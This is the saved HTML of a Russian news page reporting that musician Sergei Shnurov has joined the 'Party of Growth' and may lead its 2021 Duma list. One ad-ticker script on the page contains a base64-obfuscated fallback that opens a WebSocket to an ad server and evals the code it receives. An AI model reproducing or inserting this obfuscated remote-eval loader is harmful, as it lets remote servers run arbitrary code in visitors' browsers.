<!DOCTYPE HTML>
<html>
<head>
	<link rel="shortcut icon" href="/template/favicon.ico" type="image/x-icon" />
	<title>«Со мной будет веселее»: Сергей Шнуров может возглавить «Партию Роста» на выборах в Госдуму</title>
   <!-- <a href="https://plus.google.com/100694128759209936966" rel="publisher">Google+</a> -->
   <meta name='yandex-verification' content='4e5c60ef7ea1fddb' />
    <meta name="google-site-verification" content="LOyVQKrRMTa5KeWZPnGMH8UAKGyBsfg6nK5zy3C9eQs" />
	<meta http-equiv="content-type" content="text/html" />
	<meta name="author" content="Dmitriy" />
	<meta charset="utf-8" />
	<meta name="keywords" content="дмитриев, титов, партия, рост, петербург, шнуров, сергей, ленинград, госдума, музыкант, оксана, борис, год, выборы, лидер, политик, день, санкт, шнур, съезд, пресс, отделение, служба, слово, пулково, заседание, телеграм, хулиган, разговор, амбиция, матерш" />
	<meta name="description" content="Сегодня музыкант участвует в заседании партии, которое проходит в одном из отелей Петербурга" />
	<link rel="stylesheet" type="text/css" href="/template/style.css?v6" />
	<link href="/template/jquery-ui-1.10.3/css/smoothness/jquery-ui-1.10.3.custom.css" rel="stylesheet" />
	<script type="text/javascript" src="/template/jquery-1.10.2.min.js"></script>
	<script type="text/javascript" src="/template/jquery-ui-1.10.3/js/jquery-ui-1.10.3.custom.js"></script>
	
	<script type="text/javascript" src="/template/button-up.js?v1"></script>
	
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
	<script>
	  (adsbygoogle = window.adsbygoogle || []).push({
	    google_ad_client: "ca-pub-4416081994444783",
	    enable_page_level_ads: true
	  });
	</script>
    <meta name="3a0e0e9bfd0044428d8b6ed412693f2c" content="">
</head>

<body>

<div class="wrap">
	<div class="header">
		<div class="logo"><a href="/"><img src="/template/logo.jpg" /></a></div>
		<div style="float: left; width: 650px; height: 90px; text-align: left; vertical-align: middle;">
			<div style="float: right; position: relative; width: 0; height: 0;">
				<div style="position: absolute; top: -15px; right: 0; height: 73px; overflow: hidden;">
									</div>
			</div>
			<p style="font-family: Georgia, 'Times New Roman', Times, serif; font-size:16px; padding-left: 20px; font-style:italic; margin: 10px 0">Последние новости политики России,<br> Украины, Белоруссии и мира</p>
			<div style="float: right;">
								<div class="header_menu_social">
					<a rel="nofollow" href="https://pravdoryb.info/rss/index" target="_blank"><img src="/template/social/rss.jpg" /></a>
					<a rel="nofollow" href="http://vk.com/public39127607" target="_blank"><img src="/template/social/vk.jpg" /></a>
										<a rel="nofollow" href="https://plus.google.com/102614736211453900457" target="_blank"><img src="/template/social/google.jpg" /></a>
										<a rel="nofollow" href="http://www.odnoklassniki.ru/group/52317433823313" target="_blank"><img src="/template/social/odnoklassniki.jpg" /></a>
				</div>
			</div>
		</div>
	</div>


	<div class="header_menu">
		<div style="float: left;"><a href="/" style=" padding: 6px; line-height: 0; "><img src="/template/home.png" alt="Главная" style="display: inline-block; height: 28px;" /></a></div>
		<div style="float: left;">
			<a href="/category/v-rossii">В России</a>
			<a href="/category/v-mire">В мире</a>
			<a href="/category/ukraina">Украина</a>
			<a href="/category/politika">Политика</a>
			<a href="/category/analitika">Аналитика</a>
			<a href="/category/video">Видео</a>
			<a href="/category/voyna-na-ukraine">Война</a>
			<a href="/category/karikatury">Карикатуры</a>
		</div>
		<div style="float: right; width: 250px; padding: 7px 0;">
			<form action="/pages/search" method="GET">
				<input style="width: 150px;" type="text" name="query" value="" />
				<input style="width: 60px;" type="submit" value="Поиск" />
			</form>
		</div>
	</div>

	<div class="body">
					<div><style>
table.latestnews{margin: 5px 0 -5px 0; width: 100%;}
table.latestnews td{vertical-align: top; padding: 0;}
table.latestnews div.title{margin: 0 5px 0 105px; font-weight: normal; font-family: Arial; text-align: justify; font-size: 12px;}
table.latestnews div.title a:hover{color: #0F5FC2}
table.latestnews div.title a{color: #555555}
</style>

<table class="latestnews">
	<tr>
					<td style="width: 25%;">
				<a style="float: left;" href="/trutnev-glava-kamchatki-dolzhen-sprosit-mnenie-zhiteley-kraya-o-reshenii-idti-na-vybory-196420.html">
					<img src="/upload/editor/news/2020.02/100x60xC/5e4e4940bf1d0_1582188864.jpg" />
				</a>
				<div class="title">
					<a href="/trutnev-glava-kamchatki-dolzhen-sprosit-mnenie-zhiteley-kraya-o-reshenii-idti-na-vybory-196420.html">Трутнев: глава Камчатки должен спросить мнение жителей края о решении идти на вы...</a>
				</div>
			</td>
					<td style="width: 25%;">
				<a style="float: left;" href="/amerikanskiy-bronevik-v-sirii-vydavil-na-obochinu-rossiyskiy-tigr-196440.html">
					<img src="/upload/editor/news/2020.02/100x60xC/5e4e7a66162f5_1582201446.jpg" />
				</a>
				<div class="title">
					<a href="/amerikanskiy-bronevik-v-sirii-vydavil-na-obochinu-rossiyskiy-tigr-196440.html">Американский броневик в Сирии выдавил на обочину российский «Тигр»</a>
				</div>
			</td>
					<td style="width: 25%;">
				<a style="float: left;" href="/otkrovennyy-razgovor-prezidenta.html">
					<img src="/upload/editor/news/2020.02/100x60xC/5e4e655056bf5_1582196048.jpg" />
				</a>
				<div class="title">
					<a href="/otkrovennyy-razgovor-prezidenta.html">Откровенный разговор президента</a>
				</div>
			</td>
					<td style="width: 25%;">
				<a style="float: left;" href="/igor-panarin-mirovaya-politika--lichnaya-razvedka-stalina.html">
					<img src="/upload/editor/news/2020.02/100x60xC/5e4e37b7b32c1_1582184375.jpg" />
				</a>
				<div class="title">
					<a href="/igor-panarin-mirovaya-politika--lichnaya-razvedka-stalina.html">Игорь Панарин: Мировая политика . Личная разведка Сталина</a>
				</div>
			</td>
			</tr>
</table></div>
		        <div style="text-align: center; padding-top: 5px;"></div>
		<table style="width: 100%; border: none; border-spacing: 0px; min-height: 500px; float: left" cellspacing="0" cellpadding="0">
			<tr>
				<td class="content">
					<div class="breadcrumbs">
	<a href="/">Главная</a>&nbsp;/	<a href="/category/v-rossii">В России</a></div>										                        <h1>
                        «Со мной будет веселее»: Сергей Шнуров может возглавить «Партию Роста» на выборах в Госдуму                        </h1>
                    					<link rel="image_src" href="https://pravdoryb.info/upload/editor/news/2020.02/5e4e7a69754ac_1582201449.jpg" />
<div class="page_header">
	<span class="date" style="font-style: italic;">20 февраля 2020, 15:24</span>
	&nbsp;&bullet;&nbsp;
	<span class="views" style="background-position: 0 3px;">41</span>&nbsp;&bullet;&nbsp;В России</div>

<script type="text/javascript">(function(w,doc) {
if (!w.__utlWdgt ) {
    w.__utlWdgt = true;
    var d = doc, s = d.createElement('script'), g = 'getElementsByTagName';
    s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
    s.src = ('https:' == w.location.protocol ? 'https' : 'http')  + '://w.uptolike.com/widgets/v1/uptolike.js';
    var h=d[g]('body')[0];
    h.appendChild(s);
}})(window,document);
</script>
<div style="float: right; padding: 4px;" class="uptolike-buttons"
	data-background-alpha="0.0" 
	data-buttons-color="#FFFFFF" 
	data-counter-background-color="#ffffff" 
	data-share-counter-size="12" 
	data-top-button="false" 
	data-share-counter-type="separate" 
	data-share-style="1" 
	data-mode="share" 
	data-like-text-enable="false" 
	data-mobile-view="true" 
	data-icon-color="#ffffff" 
	data-orientation="horizontal" 
	data-text-color="#000000" 
	data-share-shape="rectangle" 
	data-sn-ids="fb.vk.tw.ok.gp.mr." 
	data-share-size="30" 
	data-background-color="#ffffff" 
	data-preview-mobile="false" 
	data-mobile-sn-ids="fb.vk.tw.wh.ok.vb." 
	data-pid="1671092" 
	data-counter-background-alpha="1.0" 
	data-following-enable="false" 
	data-exclude-show-more="true" 
	data-selection-enable="true">
</div>

<div style="clear: both;"></div>

<div class="page_content"><!--StartContent-->
	<div style="text-align: center"><!-- AdSense-->      
<div style="margin-top:10px; text-align:center;">   
<!-- pravdoryb_banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-4416081994444783"
     data-ad-slot="8751784356"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div><p style="text-align: center"><img src="/upload/editor/news/2020.02/5e4e7a69754ac_1582201449.jpg" alt="" class=""></p><div id="hypercontext"> <p>Лидер группы «<span>Ленинград</span>», хулиган и матершинник Сергей Шнуров в скором времени может стать благопристойным политиком. Разговоры о его амбициях идут не первый день, а сегодня музыканта заметили на съезде «Партии Роста», которое проходит в одном из отелей Санкт-<span>Петербурга</span>.</p> <p>- 20 февраля в рамках поездки Председатель партии Борис <span>Титов</span>, совместно, с Оксаной <span>Дмитриевой</span>, руководителем фракции «Партия Роста» в Заксобрании Санкт-Петербурга, встретится с председателями региональных отделений «Партии Роста». Участники встречи обсудят стратегию выборных кампаний в 2020 и 2021 годах, - говорится в сообщении пресс-службы партии.</p> 						<div class="pageinf_left"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!— pravdoryb_336*280 —>
<ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px"
data-ad-client="ca-pub-4416081994444783"
data-ad-slot="6265395153"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>
						<p>О <span>Шнурове</span> там нет ни слова, но уже известно, что музыкант встретил Титова в аэропорту <span>Пулково</span>, а потом вместе с ним поехал на заседание. Там лидеру «Ленинграда» вручили партийный билет, а он в ответ пообещал называть все своими именами и заявил, что с ним «будет веселее».</p> <div> <div> <span></span><div> <span></span><div data-share-url="https://www.spb.kp.ru/daily/27094/4167236/?share.target.class=4&amp;share.target.id=1869430#4-1869430" data-share-title='Лидер "Ленинграда" стал политиком. Фото: Олег Николаев / личная страничка в соцсетях' data-share-descr="" data-share-image="https://s9.stc.all.kpcdn.net/share/i/4/1869430/cr-1074-480.vn-4-1411785-100-tl-0-0.t-13-4167236-ttps-40-10-32173D-830-l-85-m-23.t-13-4167236-ttps-40-10-FFF-830-l-85-m-22.t-207-1-ossb-25-10-FFF-788-l-110-t-35" data-share-tags="дмитриев, титов, партия, рост, петербург, шнуров, сергей, ленинград, госдума, музыкант, оксана, борис, год, выборы, лидер, политик, день, санкт, шнур, съезд, пресс, отделение, служба, слово, пулково, заседание, телеграм, хулиган, разговор, амбиция, матершинник, отель, время, группа, участник, председатель, поездка, кампания, фракция, встреча, руководитель, сообщение, заксобрание, стратегия, февраль, рамка, имя, ответ, билет, аэропорт, лицо, данные, канал, павел, дума, смоляк, журналист, список, подтверждение, корреспондент, комсомолка, глава, звонок, сотрудничество, решение, поздравление, принятие, бэкграунд, человек, выбор, ориентация, кандидат, фильм, песня, штраф, лексика, шутка, участие, вопрос"> <span data-share-type="tw"><span></span></span><span data-share-type="fb"><span></span></span><span data-share-type="vk"><span></span></span><span data-share-type="ok"><span></span></span><span data-share-type="ml"><span></span></span> </div> </div> <img alt='' src="/upload/editor/news/2020.02/5e4e7a699b43d_1582201449.jpg" class=""> </div> <p>Лидер "Ленинграда" стал политиком. Фото: Олег Николаев / личная страничка в соцсетях<span> </span></p> </div> <p>По некоторым данным, Сергея Шнурова могут даже сделать лицом «Партии Роста» на выборах в <span>Госдуму</span>, которые пройдут в 2021 году.</p> <p>- Сергей Шнуров возглавит список «Партии Роста» на выборах в Государственную Думу. Так сказал Борис Титов сегодня в Петербурге, - пишет в своем <span>телеграм</span>-канале петербургский журналист Павел Смоляк.</p> <p>Официальных подтверждений от пресс-службы «Партии Роста» пока получить не удалось. Зато на звонок корреспондента «Комсомолки» ответила глава петербургского отделения партии Оксана Дмитриева.</p> <p>- Спасибо, - ответила на поздравления с принятием в партию Шнурова сама Дмитриева. - У нас уже некоторое было сотрудничество, а решение принято сейчас и мы его приурочили к съезду.</p> <p>При этом матершинного бэкграунда музыканта, исполнявшего в фильме «День выборов» песню со словами: «Выборы, выборы, кандидаты ****** (люди нетрадиционной ориентации)», в «Партии Роста» не боятся.</p> <p>- Сегодня заседание прошло с очень приличной лексикой. А то, что Борис Титов пообещал платить штрафы за Сергея, ну, это шутка.</p> <p>А вот на вопрос об участии Шрунова в выборах в Госдуму 2021 года Оксана Дмитриева ответила уклончиво.</p> <div data-new-adfox-slot-name="11slot"></div> <p>- Ничего я не могу подтвердить, но и исключить тоже, - заявила политик.</p> </div><p style=" font-style:italic;">
<span style="font-weight: bold;">Подпишитесь на нас</span>
<noidex>
	<a rel="nofollow" href="http://vk.com/public39127607" target="_blank">Вконтакте</a>, 
	<a rel="nofollow" href="http://www.odnoklassniki.ru/group/52317433823313" target="_blank">Одноклассники</a>
</noindex>
</p>
<!-- Composite Start --> <div id="M288812ScriptRootC655639" style="min-height:185px;"> <div id="M288812PreloadC655639"> Загрузка... </div> <script> (function(){ var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById'; var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M288812ScriptRootC655639")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];} catch(e){var iw=d;var c=d[gi]("M288812ScriptRootC655639");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=655639;c[ac](dv); var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsc.marketgid.com/p/r/pravdoryb.info.655639.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})(); </script> </div> <!-- Composite End -->
<br>
<!-- Yandex.RTB R-A-349883-1 -->
<div id="yandex_rtb_R-A-349883-1"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-349883-1",
                renderTo: "yandex_rtb_R-A-349883-1",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
<br>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- pravdoryb_adapt -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-4416081994444783"
     data-ad-slot="7039435316"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

<br>

<script class="r36702" type="text/javascript">
    (function() {
        var worker36702,
            tickerID = 36702,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36702'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36702');
            script.setAttribute('data-idn', idn);
            script.src = '//virt0n.news/ru-n4p/0/36/ticker_36702.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36702.postMessage(data);
                }

                worker36702 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36702.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36702.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
<!-- AdSense-->      
<div style="margin-top:10px; text-align:center;">   
<!-- pravdoryb_banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-4416081994444783"
     data-ad-slot="8751784356"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>

<!--EndContent--></div>

<div class="views" style="background-position: 0 3px; float: right;">41</div>

<div style="clear: both;"></div>
<div class="author">
						<noindex>
				<a href="https://www.spb.kp.ru/daily/27094/4167236/" rel="nofollow" target="_blank">Источник</a>
			</noindex>
			</div>



<div class="uptolike-buttons" style="margin-top: -2px;"
	data-hover-effect="rotate-cw"
	data-background-alpha="0.0" 
	data-buttons-color="#FFFFFF" 
	data-counter-background-color="#ffffff" 
	data-share-counter-size="12" 
	data-top-button="false" 
	data-share-counter-type="separate" 
	data-share-style="1" 
	data-mode="share" 
	data-like-text-enable="false" 
	data-mobile-view="true" 
	data-icon-color="#ffffff" 
	data-orientation="horizontal" 
	data-text-color="#000000" 
	data-share-shape="rectangle" 
	data-sn-ids="fb.vk.tw.ok.gp.mr." 
	data-share-size="30" 
	data-background-color="#ffffff" 
	data-preview-mobile="false" 
	data-mobile-sn-ids="fb.vk.tw.wh.ok.vb." 
	data-pid="1671092" 
	data-counter-background-alpha="1.0" 
	data-following-enable="false" 
	data-exclude-show-more="true" 
	data-selection-enable="true">
</div>


<style>
table.pagenews_informer{margin-top: 10px; }
table.pagenews_informer td{vertical-align: top; padding: 0 10px;}
table.pagenews_informer div.title{margin: 0; font-weight: normal; font-family: times; text-align: center; font-size: 18px; max-width: 240px;}
table.pagenews_informer .date{font-size: 12px; font-family: arial; margin: 0; color: #b1b2b5}
.pagenews_informer_header{margin-top: 20px; height: 10px;}
.pagenews_informer_header hr{border-top: 1px solid #1F1F1F;}
.pagenews_informer_header .name{position: relative; height: 22px; top: -22px; background: white; left: 100px; width: 180px; text-align: center; font-size: 22px; font-family: Times; color: #1F1F1F;}
</style>

<div class="pagenews_informer_header">
	<hr />
	<div class="name">Похожие новости</div>
</div>

<table class="pagenews_informer">
	<tr>
					<td style="width: 33%;">
				<a href="/vladimir-putin-znal-li-medvedev-ob-otstavke-i-pochemu-vybral-mishustina-premerom-196445.html">
					<img src="/upload/editor/news/2020.02/230x150xC/5e4e7a72a4e64_1582201458.jpg" />
				</a>
				<div class="date">20 февраля 2020, 15:24</div>
				<div class="title">
					<a href="/vladimir-putin-znal-li-medvedev-ob-otstavke-i-pochemu-vybral-mishustina-premerom-196445.html">Владимир Путин: Знал ли Медведев об отставке и почему выбрал Мишустина премьером</a>
				</div>
				<span class="date"></span>
			</td>
					<td style="width: 33%;">
				<a href="/koronavirus-i-ukraina-v-nezalezhnoy-chut-bylo-ne-poyavilas-vtoraya-nebesnaya-sotnya-196443.html">
					<img src="/upload/editor/news/2020.02/230x150xC/5e4e7a6cba6bb_1582201452.jpg" />
				</a>
				<div class="date">20 февраля 2020, 15:24</div>
				<div class="title">
					<a href="/koronavirus-i-ukraina-v-nezalezhnoy-chut-bylo-ne-poyavilas-vtoraya-nebesnaya-sotnya-196443.html">Коронавирус и Украина: в Незалежной чуть было не появилась вторая «Небесная сотня»</a>
				</div>
				<span class="date"></span>
			</td>
					<td style="width: 33%;">
				<a href="/ot-40-i-starshe-rossiyane-smogut-brat-besplatnye-otguly-dlya-prokhozhdeniya-dispanserizatsii-196444.html">
					<img src="/upload/editor/news/2020.02/230x150xC/5e4e7a70334c3_1582201456.jpg" />
				</a>
				<div class="date">20 февраля 2020, 15:24</div>
				<div class="title">
					<a href="/ot-40-i-starshe-rossiyane-smogut-brat-besplatnye-otguly-dlya-prokhozhdeniya-dispanserizatsii-196444.html">От 40 и старше: россияне смогут брать бесплатные отгулы для прохождения диспансеризации</a>
				</div>
				<span class="date"></span>
			</td>
			</tr>
</table>

<!-- AdSense-->      
<div style="margin-top:10px; text-align:center;">   
<!-- pravdoryb_banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-4416081994444783"
     data-ad-slot="8751784356"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>



<table class="pagenews_informer">
	<tr>
					<td style="width: 33%;">
				<a href="/putin--na-kollegii-fsb-my-ponimaem-chto-bylo-by-esli-by-vam-ne-udalos-eto-sdelat-196439.html">
					<img src="/upload/editor/news/2020.02/230x150xC/5e4e7a631b4c0_1582201443.jpg" />
				</a>
				<div class="date">20 февраля 2020, 15:24</div>
				<div class="title">
					<a href="/putin--na-kollegii-fsb-my-ponimaem-chto-bylo-by-esli-by-vam-ne-udalos-eto-sdelat-196439.html">Путин — на коллегии ФСБ: Мы понимаем, что было бы, если бы вам не удалось это сделать</a>
				</div>
				<span class="date"></span>
			</td>
					<td style="width: 33%;">
				<a href="/tekhnicheskaya-neispravnost-ili-narushenie-pravil-pyat-chelovek-gospitalizirovany-posle-zhyostkoy-posadki-samolyota-v-magadane-196422.html">
					<img src="/upload/editor/news/2020.02/230x150xC/5e4e61c85e5d5_1582195144.jpg" />
				</a>
				<div class="date">20 февраля 2020, 13:39</div>
				<div class="title">
					<a href="/tekhnicheskaya-neispravnost-ili-narushenie-pravil-pyat-chelovek-gospitalizirovany-posle-zhyostkoy-posadki-samolyota-v-magadane-196422.html">Техническая неисправность или нарушение правил: пять человек госпитализированы после жёсткой посадки самолёта в Магадане</a>
				</div>
				<span class="date"></span>
			</td>
					<td style="width: 33%;">
				<a href="/povyshennoe-obespechenie-s-1-aprelya-sotsialnye-pensii-proindeksiruyut-na-6-1-196350.html">
					<img src="/upload/editor/news/2020.02/230x150xC/5e4d7d4f5ba37_1582136655.jpg" />
				</a>
				<div class="date">19 февраля 2020, 21:24</div>
				<div class="title">
					<a href="/povyshennoe-obespechenie-s-1-aprelya-sotsialnye-pensii-proindeksiruyut-na-6-1-196350.html">Повышенное обеспечение: с 1 апреля социальные пенсии проиндексируют на 6,1%</a>
				</div>
				<span class="date"></span>
			</td>
			</tr>
</table>

<div style="margin-top: 10px;"></div>

<div class="pagenews_informer_header" style="margin-top: 30px;">
	<hr />
	<div class="name" style="width: 205px;">Новости партнеров</div>
</div>
<div style="margin-top: 10px;"><style type="text/css">div.mgline{min-width: 160px !important;}
</style>
<div id="pravdoryb_informer_h">&nbsp;</div>
<script type="text/javascript" src="https://pravdoryb.info/template/widget.js"></script><script type="text/javascript">
mmInformerloadWidget('pravdoryb_informer_h', 'https://pravdoryb.info/widget/mixedNews?id=2&limit=3&itype=h');
</script>

</div>

				</td>
				<td class="lefter" id="td_right_column">
					<div id="right_column">
						<script type="text/javascript">
							$(window).scroll(function(){
								//console.log($(document).height());
								//console.log($(this).scrollTop());
								var diff = $(document).height() - $(this).scrollTop();
								var diffLimit = 1000;
								var rightColumnTopOffset = $('#right_column').offset().top;
	
								if ($(this).scrollTop() > $('#right_column').height()+rightColumnTopOffset){ 
									//$('#right_banner').css({position:'fixed',top:'30px'});
									$('#right_banner').hide();
									$('#right_tall_banner').show();
									if(diff > diffLimit){
										$('#right_tall_banner').css({top: '20px'});
									}else{
										$('#right_tall_banner').css({top: (diff-diffLimit)+'px'});
									}
								}else {
									//$('#right_banner').css({top:'0px',position:'static'});
									$('#right_tall_banner').hide();
									$('#right_banner').show();
								}
							});
						</script>
						<div id="right_banner">
	                		<!-- AdSense-->      
<div style="margin-top:10px;">          
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- pravdoryb_336*280 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-4416081994444783"
     data-ad-slot="6265395153"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>	                	</div>
	                	<div id="right_tall_banner" style="display: none; position: fixed; top: 20px;">
	                		<!-- pravdoryb_300*600 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:600px"
     data-ad-client="ca-pub-4416081994444783"
     data-ad-slot="1878517951"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>						</div>
						
	                	<div><div class="sidenews_title">
	<hr />
	<div class="name">Выбор дня</div>
</div>
	<table class="sidenews" >
		<tr>
			<td style="width: 150px;"><a href="/quotvoyna-s-rossiey-prodlitsya-48-chasov-i-vsyoquot-kievu-ne-nado-orat-pro-marionetok-nastalo-vremya-quotsmotret-v-glazaquot---malofeev.html"><img width="150" src="/upload/editor/news/2020.02/150x100xC/5e4e37aa0c840_1582184362.jpg" /></a></td>
			<td>
				<div class="date">20 февраля 2020, 10:39</div>
				<div class="title"><a href="/quotvoyna-s-rossiey-prodlitsya-48-chasov-i-vsyoquot-kievu-ne-nado-orat-pro-marionetok-nastalo-vremya-quotsmotret-v-glazaquot---malofeev.html">&quot;Война с Россией продлится 48 часов. И всё!&quot;: Киеву не надо орать про марио...</a></div>
			</td>
		</tr>
	</table>
	<table class="sidenews" >
		<tr>
			<td style="width: 150px;"><a href="/chto-bylo-by-s-ukrainoy-i-rossiey-esli-by-maydan-proigral-196383.html"><img width="150" src="/upload/editor/news/2020.02/150x100xC/5e4dc394aa7c9_1582154644.jpg" /></a></td>
			<td>
				<div class="date">20 февраля 2020, 02:24</div>
				<div class="title"><a href="/chto-bylo-by-s-ukrainoy-i-rossiey-esli-by-maydan-proigral-196383.html">Что было бы с Украиной и Россией, если бы майдан проиграл</a></div>
			</td>
		</tr>
	</table>
	<table class="sidenews" >
		<tr>
			<td style="width: 150px;"><a href="/quotne-pozvolim-geroizirovat-posobnikov-tretego-reykhaquot-pereimenovanie-prospektov-v-kieve-obernulos-sudom.html"><img width="150" src="/upload/editor/news/2020.02/150x100xC/5e4e09f60c59e_1582172662.jpg" /></a></td>
			<td>
				<div class="date">20 февраля 2020, 07:24</div>
				<div class="title"><a href="/quotne-pozvolim-geroizirovat-posobnikov-tretego-reykhaquot-pereimenovanie-prospektov-v-kieve-obernulos-sudom.html">&quot;Не позволим героизировать пособников Третьего рейха&quot;: Переименование просп...</a></div>
			</td>
		</tr>
	</table>
	<table class="sidenews" >
		<tr>
			<td style="width: 150px;"><a href="/quotkakoe-zhe-bylo-razocharovanie-nuvorisheyquot-sadalskiy-o-tom-kak-putin-provyol-oligarkhov-na-pokhoronakh-sobchaka.html"><img width="150" src="/upload/editor/news/2020.02/150x100xC/5e4dae81ddc9a_1582149249.jpg" /></a></td>
			<td>
				<div class="date">20 февраля 2020, 00:54</div>
				<div class="title"><a href="/quotkakoe-zhe-bylo-razocharovanie-nuvorisheyquot-sadalskiy-o-tom-kak-putin-provyol-oligarkhov-na-pokhoronakh-sobchaka.html">&quot;Какое же было разочарование нуворишей&quot;: Садальский о том, как Путин провёл...</a></div>
			</td>
		</tr>
	</table>
	<table class="sidenews" >
		<tr>
			<td style="width: 150px;"><a href="/quotkrysa-vor-sadistquot-sotrudnitsa-quotekha-moskvyquot-iz-ssha-oskorbila-silovikov-rossii---sotsseti.html"><img width="150" src="/upload/editor/news/2020.02/150x100xC/5e4ddc3f82e2b_1582160959.jpg" /></a></td>
			<td>
				<div class="date">20 февраля 2020, 04:09</div>
				<div class="title"><a href="/quotkrysa-vor-sadistquot-sotrudnitsa-quotekha-moskvyquot-iz-ssha-oskorbila-silovikov-rossii---sotsseti.html">&quot;Крыса, вор, садист&quot;: Сотрудница &quot;Эха Москвы&quot; из США оскорбила си...</a></div>
			</td>
		</tr>
	</table>
</div>
	                	<div class="sidenews_title">
<hr />
<div class="name" style="width: 200px;">Новости партнеров</div>
</div>

<!-- Composite Start -->
<div id="M288812ScriptRootC658053">
        <div id="M288812PreloadC658053">
        Загрузка...    </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById',lp=d.location.protocol,wp=lp.indexOf('http')==0?lp:'https:';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M288812ScriptRootC658053")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("M288812ScriptRootC658053");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=658053;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src=wp+"//jsc.marketgid.com/p/r/pravdoryb.info.658053.js?t="+D.getYear()+D.getMonth()+D.getUTCDate()+D.getUTCHours();c[ac](s);})();
    </script>
    </div>
<!-- Composite End -->
